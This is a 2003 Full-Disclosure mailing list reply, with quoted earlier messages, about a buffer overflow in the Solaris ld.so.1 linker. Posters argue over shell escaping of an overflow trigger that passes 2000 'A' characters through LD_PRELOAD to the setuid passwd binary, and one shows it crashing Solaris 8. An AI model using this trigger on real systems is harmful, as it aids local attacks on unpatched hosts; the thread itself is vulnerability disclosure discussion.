Paul, you are mistaken. Why are you trying to escape the backtick with a '/' (forwardslash) ... Escapes are '\' (backslash) .. But nice try. But since you must not have any nix boxes around, let me be the nice guy and show you the output of your misguided command structure. And let's not even go into why you would want to escape the perl command anyhow, seeing how that totally defeats the purpose of this entire thread.
so, here we go. Paul wants to escape perl.. sounds good, lets see what happens. LD_PRELOAD=\`perl -e 'print "A"x2000'\` passwd LD_PRELOAD=`perl: Command not found. So, now, Paul wants to use his so-called escape character (/) to escape just the trailing backtick.. so here we go: LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd syntax error at -e line 1, at EOF Execution of -e aborted due to compilation errors. LD_PRELOAD=/: Command not found. So, the correct way of doing this is exactly the way David posted originally. $ LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd ld.so.1: passwd: warning: /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... (bunch of A's) AAAAAAAAAAAAAAAAAAAAAAAAAAA/: open failed: illegal insecure pathname Segmentation Fault oh, and this was done on a solaris 8 box. peace -0 On Thu, 2003-07-31 at 11:08, Schmehl, Paul L wrote: > > -----Original Message----- > > From: Jim Dew [mailto:[EMAIL PROTECTED] > > Sent: Wednesday, July 30, 2003 8:19 PM > > To: Jouko Pynnonen > > Cc: [EMAIL PROTECTED] > > Subject: [Full-Disclosure] Re: Fwd: Re: Solaris ld.so.1 > > buffer overflow > > > > > > On Wed, Jul 30, 2003 at 07:49:28PM +0300, Jouko Pynnonen wrote: > > > > > > On Wed, Jul 30, 2003 at 12:37:44PM -0400, Rukshin, David wrote: > > > > Modify the command (you need to add a trailing slash) to be the > > > > following: > > > > > > > > LD_PRELOAD=/`perl -e 'print "A"x2000'`/ passwd > > > > > > > > and try it again. > > > > > > > this segfaults on solaris 2.6 > > > Try moving the escape to *before* the backtick: > LD_PRELOAD=/`perl -e 'print "A"x2000'/` passwd > > Paul Schmehl ([EMAIL PROTECTED]) > Adjunct Information Security Officer > The University of Texas at Dallas > AVIEN Founding Member > http://www.utdallas.edu/~pauls/ > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
